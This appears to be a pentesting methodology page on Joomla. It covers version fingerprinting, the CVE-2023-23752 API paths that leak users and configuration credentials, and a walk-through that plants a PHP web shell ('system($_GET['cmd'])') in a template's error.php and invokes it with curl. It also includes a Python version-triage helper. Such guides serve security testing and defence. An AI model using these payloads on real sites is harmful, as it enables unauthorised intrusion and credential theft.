Joomla

Joomla Statistics

Joomla collects some anonymous usage statistics, such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public API.

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
    "data": {
        "cms_version": {
            "3.0": 0,
            "3.1": 0,
            "3.10": 6.33,
            "3.2": 0.01,
            "3.3": 0.02,
            "3.4": 0.05,
            "3.5": 12.24,
            "3.6": 22.85,
            "3.7": 7.99,
            "3.8": 17.72,
            "3.9": 27.24,
            "4.0": 3.21,
            "4.1": 1.53,
            "4.2": 0.82,
            "4.3": 0,
            "5.0": 0
        },
        "total": 2951032
    }
}

Enumeration

Discovery/Footprinting

  • Check the meta

  • robots.txt

  • README.txt

Version

  • In /administrator/manifests/files/joomla.xml you can see the version.

  • In /language/en-GB/en-GB.xml you can get the version of Joomla.

  • In plugins/system/cache/cache.xml you can see an approximate version.

Automatic

The 80,443 - Pentesting Web Methodology page has a section about CMS scanners that can scan Joomla.

API Unauthenticated Information Disclosure:

Versions from 4.0.0 to 4.2.7 are vulnerable to an unauthenticated information disclosure (CVE-2023-23752) that dumps credentials and other information.

  • Users: http://<host>/api/v1/users?public=true

  • Config File: http://<host>/api/index.php/v1/config/application?public=true

MSF module: scanner/http/joomla_api_improper_access_checks or Ruby script: 51334
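Added example (not part of the original page): a small Python helper that parses the version out of the manifest files listed in the Version section above and flags whether it falls in the CVE-2023-23752 range, so you can triage your own Joomla installs. The manifest text is a constructed sample; `fetch_and_assess` and its base URL are assumptions, not part of any Joomla API.

```python
import re
import urllib.request
import xml.etree.ElementTree as ET

# Constructed sample of /administrator/manifests/files/joomla.xml, trimmed to the
# elements that matter here (a real manifest carries more metadata).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<extension type="file" method="upgrade">
    <name>files_joomla</name>
    <author>Joomla! Project</author>
    <version>4.2.5</version>
    <description>FILES_JOOMLA_XML_DESCRIPTION</description>
</extension>
"""

# Manifest paths from the page that expose the version (relative to the site root).
MANIFEST_PATHS = ("/administrator/manifests/files/joomla.xml", "/language/en-GB/en-GB.xml")


def parse_manifest_version(xml_text: str) -> str:
    """Return the <version> text from a Joomla manifest (joomla.xml or en-GB.xml)."""
    root = ET.fromstring(xml_text)
    node = root.find("version")
    if node is None or not node.text:
        raise ValueError("manifest has no <version> element")
    return node.text.strip()


def version_tuple(version: str) -> tuple:
    """'4.2.5' -> (4, 2, 5); a suffix such as '-rc1' is ignored, a missing patch is 0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def affected_by_cve_2023_23752(version: str) -> bool:
    """Affected range as stated on the page: 4.0.0 up to and including 4.2.7."""
    return (4, 0, 0) <= version_tuple(version) <= (4, 2, 7)


def assess(xml_text: str) -> dict:
    """Combine version extraction and the range check into one triage result."""
    version = parse_manifest_version(xml_text)
    return {"version": version, "cve_2023_23752": affected_by_cve_2023_23752(version)}


def fetch_and_assess(base_url: str, timeout: int = 10) -> dict:
    """Assumption: fetch the first readable manifest from a site you administer."""
    for path in MANIFEST_PATHS:
        try:
            with urllib.request.urlopen(base_url.rstrip("/") + path, timeout=timeout) as r:
                return assess(r.read().decode("utf-8", "replace"))
        except Exception:  # 404, network error or malformed XML: try the next path
            continue
    raise RuntimeError("no readable manifest found")
```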

Brute-Force

You can use this script to attempt to brute force the login.

RCE

If you obtain admin credentials you can get RCE by adding a snippet of PHP code to a template. We can do this by customizing a template.

  1. Click on Templates on the bottom left under Configuration to pull up the templates menu.

  2. Click on a template name. Let's choose protostar under the Template column header. This will bring us to the Templates: Customise page.

  3. Finally, you can click on a page to pull up the page source. Let's choose the error.php page. We'll add a PHP one-liner to gain code execution as follows:

    system($_GET['cmd']);

  4. Save & Close

  5. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id

From XSS to RCE

  • JoomSploit: Joomla exploitation script that elevates XSS to RCE or other critical vulnerabilities. For more info check this post. It supports Joomla versions 5.X.X, 4.X.X and 3.X.X, and allows you to:

    • Privilege Escalation: Creates a user in Joomla.

    • (RCE) Built-In Templates Edit: Edits a built-in template in Joomla.

    • (Custom) Custom Exploits: Custom exploits for third-party Joomla plugins.
